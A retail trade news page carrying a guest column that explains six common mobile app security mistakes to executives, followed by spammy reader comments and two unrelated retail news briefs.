News

Six Most Common Mobile App Security Mistakes

BY CSA STAFF

By Nish Bhalla, [email protected]

It’s hard to think of a company, retail or otherwise, that isn’t developing a mobile app these days — but the vast majority of apps are riddled with security flaws that could jeopardize the end-user and expose the company to high costs and embarrassment.

In a recent study with HP, we found that 77% of mobile apps are guilty of information leakage, 26% fail to encrypt properly and 33% are vulnerable to a common hack attack.

The problem generally stems from the fact that many developers aren’t properly trained in security — and even those that are often put design issues ahead of security considerations. It’s common for developers to build a mobile app first, then try to “sprinkle” in security at the end. This leaves the app severely vulnerable to information leakage, unauthorized users and hack attacks. It’s more difficult — and a lot more expensive — to fix a security problem after the fact. Once an app is live, the typical remediation cost ranges from thousands to tens of thousands of dollars per flaw.

It’s important for retail executives to have a solid understanding of common mobile app security flaws and be able to ask the right questions from their developers. Security decisions can’t be left to the developers alone; they have to come from the top.

With that in mind, here are the six most common mobile app security mistakes that retail executives need to watch out for:

1. Storing Critical Information on the Phone: This is probably the most common flaw we see in mobile apps. Developers often let the app store sensitive information on the actual phone — like passwords, customer information, even encryption keys! If the phone is ever stolen or compromised, all of this information can fall into the wrong hands. TIP: The best policy is to avoid storing any information on the phone — instead, everything should be retrieved from the server the moment that the user actually logs into the app. Once they log out, all of the information should be erased.

2. Unauthorized Access: An app is supposed to have boundaries, but many don’t. When an app has a problem with “unauthorized access,” it means that a user is able to see other users’ accounts, or that a user is able to get further into the corporate system than they should be — like accessing administrative controls. Developers often make the mistake of not fully understanding what kind of information the app is sending out and how easy it is for others to use this data to compromise the app. TIP: Every time a person makes a page request in your app, the server should verify that it’s a correct request and stop them from making unauthorized requests. It should also trigger an internal alert if there are a lot of unauthorized requests.

3. Weak Encryption: Developers often fail to use proper encryption controls that will protect information as it travels from the app to the corporate server, and vice versa. This failure puts the user’s information at risk of eavesdropping – a type of hack called “man-in-the-middle.” Even worse, many app developers also forget to turn on a pop-up alert that will warn an app user if they’re at risk of eavesdropping. TIP: Make sure your app uses Secure Sockets Layer (SSL) encryption between the phone and the server. Then make sure your developer tests the app to see if it will stop working if an unauthorized third-party (known as a “proxy”) is intercepting the information.

4. Vulnerable to Hack Attacks: Without the proper security, apps can be highly susceptible to hacking. Two of the most popular types of hacks are called cross-site scripting (or XSS) and SQL injection (or SQLi). While these attacks are highly technical, the one thing you need to know is that both will essentially steal information — XSS steals it from the user (passwords, logins, cookies, etc.) and SQLi steals information from the corporate databases (it can also delete that information). TIP: At a bare minimum, you need to make sure the developer team is having the app tested against both types of hacks. There are a number of automated services out there that will do this for you. Also ask your developer if she’s testing the app for all of the vulnerabilities in the OWASP Top 10.

5. Not Protecting the Server: Mobile apps have to communicate with a server in order to work properly — but the problem is this can expose the server to data breaches. Although the typical mobile app only needs the server for a few functions, developers often mistakenly allow the server to share a lot of unnecessary data and processes with the world. This puts the server at risk. TIP: Your developer should be able to tell you exactly what is exposed by the server. All of these items need to be properly secured to prevent data breaches – not just those that are used by the mobile app.

6. Adding Advanced Features: Developers are adding a lot of advanced functionalities into today’s mobile apps — like near field communication (NFC) and QR code readers. However, in many cases developers fail to realize that these special features require a higher level of security. Without the proper security precautions, they can expose the app to a whole new set of potential attacks. TIP: You need to have a qualified security firm (called a penetration-testing firm) test the app’s advanced features against different types of hack attacks. This is the only way to ensure these features won’t undermine your security.

Nish Bhalla is the founder/CEO of Security Compass, an information security company that specializes in app security and recently developed SD Elements, a platform for secure app development. His company consults for Fortune 500s, retailers and banks, and contributed to HP’s 2012 Cyber Risk Report on mobile app threats. He can be reached at [email protected].


More Web Exclusives/Guest Commentaries

keyboard_arrow_downCOMMENTS

Leave a Reply

A.Webtech says:
Feb-04-2014 06:06 am

app development companies
It is very important to have a common retail manager mobile application security vulnerabilities have full understanding and be able to present their developers the right questions. Security decisions not just to developers, they have come from the top. app development companies

A.Webtech says:
Feb-04-2014 06:06 am

It is very important to have a common retail manager mobile application security vulnerabilities have full understanding and be able to present their developers the right questions. Security decisions not just to developers, they have come from the top. app development companies

A.James says:
May-17-2013 06:53 am

Good Tips
Good tips for mobile app security. Mobile app developers should consider these points when develop apps. Security is important factor.

A.James says:
May-17-2013 06:53 am

Good tips for mobile app security. Mobile app developers should consider these points when develop apps. Security is important factor.

S.Singh says:
May-08-2013 06:31 am

Great information aboput the Iphone
I got some very useful information about the I phones now, but there are various iPhone app development company they are sure with all these problem and also working on all problems. You can see a iPhone app development here: iPhone Application Development

I got some very useful information about the I phones now, but there are various iPhone app development company they are sure with all these problem and also working on all problems. You can see a iPhone app development here: iPhone Application Development

These are the very common
These are the very common mobile app security mistakes.One problem is that it was actually providing that unencrypted copy remotely to any other applications, so any other applications on the phone can also see that attachment. http://www.modernlifeblogs.com/2013/04/top-20-handpicked-creative-things-you-can-really-get/

These are the very common mobile app security mistakes.One problem is that it was actually providing that unencrypted copy remotely to any other applications, so any other applications on the phone can also see that attachment. http://www.modernlifeblogs.com/2013/04/top-20-handpicked-creative-things-you-can-really-get/

FINANCE

Ahold USA donates $500,000 to Boston aid fund

BY Staff Writer

Quincy, Mass. — Ahold USA and its Stop & Shop banner have donated half a million dollars to a charitable organization set up to aid victims of the recent terrorist attacks in Boston.

The company announced the donation of $500,000 to The One Fund Boston, formed by Massachusetts Gov. Deval Patrick and Boston Mayor Thomas Menino.

"Words cannot express the tragedy that took place at the Boston Marathon," Stop & Shop New England Division president Joe Kelley said. "We mourn with all of those who were affected."

keyboard_arrow_downCOMMENTS

Leave a Reply

No comments found

Polls

Consumer confidence is high. Is that reflected in your stores’ revenues?

View Results

Loading ... Loading ...
STORE SPACES

Canada’s Holt Renfrew expanding and remodeling chain

BY Marianne Wilson

Toronto — Holt Renfrew will open a flagship store in spring 2016 at Square One Shopping Centre in Mississauga. The store, planned at approximately 120,000 sq.-ft., is part of the company’s aggressive growth plan, which will result in a 40% expansion of the total square footage of Holt Renfrew’s network.

In addition to the new Square One site, a number of Holt Renfrew stores will be renovated and expanded, with some completely rebuilt.

The first newly renovated store will open later this year with the completion of Holt Renfrew Yorkdale in north Toronto, currently undergoing an expansion, doubling in size to over 120,000 sq. ft.

keyboard_arrow_downCOMMENTS

Leave a Reply

No comments found

Polls

Consumer confidence is high. Is that reflected in your stores’ revenues?

View Results

Loading ... Loading ...